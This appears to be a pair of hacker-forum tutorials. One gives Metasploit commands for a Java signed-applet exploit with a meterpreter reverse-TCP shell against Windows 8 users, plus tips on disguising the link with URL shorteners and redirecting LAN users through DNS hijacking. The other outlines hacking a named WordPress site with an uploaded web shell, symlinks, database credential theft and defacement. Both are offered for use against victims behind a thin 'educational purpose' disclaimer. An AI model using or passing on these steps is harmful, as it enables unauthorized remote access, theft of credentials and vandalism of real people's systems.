How To Hack Windows 8

Salam GuyZ,
today i’ll tell you how to hack Windows 8 Suing Java Signed Applet 😛
no doubt that most of you guys thinking that how to hack windows 8 
but in reality you can do it 🙂
just follow me 
==========
Somethings Must Be Cleared First !!!
1) ONLY For Educational Purpose
2) I am Not Responsible For Any Damage Caused By You 🙂
===============
Now Exploiting!

1)User Must Run Your Exploit In Order To Hack Him/Her
2)You Have To Forward Port!
3) Router 🙂

=================
Things We Will Need

1)BacktracK
2)Metasploit
3)This Exploit => multi/browser/java_signed_applet
4)Victim (having Windows 8)

 =======================
Lets Exploit,

First Forward Your Port 
Use This Port 

” 1337 “


Now Open msfconsole and type :

multi/browser/java_signed_applet

Like This In Picture 

set Payload ,

set PAYLOAD java/meterpreter/reverse_tcp

 set lhost

set LHOST 192.168.x.x(your ip)

Actually , there is no problem if you didnt set lhost and payload ,
it will do it automatically 🙂
Now You Have To Set Port , The Port Your Forwarded,
1337
type this to set port

set SRVPORT 1337





than change the path to the exploit for this hust type this

set URIPATH /


now type exploit to start the java applet exploit

exploit


if your port was successfully forwarded than server will be started like in the picture above 

All You Have To Do Now Is Just Send Your IP to the victim 

for doing this i’ve a nice trick 😀
goto any link shorter website like adfly or tinylink
and type this
http://YOUR IP

thank click on Short Link or any thing like that..

if your victim clicks on your given link than pop-up will appear


and if he clicks on “Run
than meterpreter shell will be opened


now just type 

sysinfo 

FOR LAN USERS – MUST READ

If you have users in LAN or you are in Net Cafe,
Than You Can Redirect All Users To Your Malicious Link By Hijacking The DNS

===============

Aww Man You Are Using Windows 8 ? And Afraid Of Getting Hacked ?
Use Latest Updates And Anti-Virus Programs , Do Not Click On Any Unwanted Link!

Note:Please Dont Leech
Written By Zaid Sparrow
Images Are Not Mine , Images Credits Goes To Dr-Z0mbie Haxor

Symlink Tutorial By Shadow008

Symlink Tutorial By Shadow008
# Asalam-O-Alikum
# 20/4/2012
# Pakistan Cyber Army
WwW.CyberArmy.com.PK
# Symlinking WordPress Using MadShell

# HellO everyone
# In this video tut, I will be teaching you how to hack a wordpress blog using symlink
# for this tut, I will be using Madshell
1st To hack a target wordpress blog,you must have access on the same server !
2nd Once you got access, upload madshell on it
# Our target is
 cornersmagazine.com/
# We are going to symlink it and get its database info
# Onces that is done we will login to its database using dbkiss
# We will then change the admins password from the database
# After that we will get access to wordpress blogs admins account and will be able to upload a shell or deface it 😀
# So lets Start !
# Thanks for watching
# I hope you understood the video
# Please feel free to reply on cyberarmy.com.pk @ Team section
# Thanks
# Greets: LeeT Haxor | 1337 | KhantastiC | ZombiE_KSA | H4x0rL1f3 | Invectus and all Pakistan Cyber Army Team
# Pakistan Cyber Army : CyberArmy.com.pk
# Video Made By Shadow008

All Credits Goes To shadow008 😉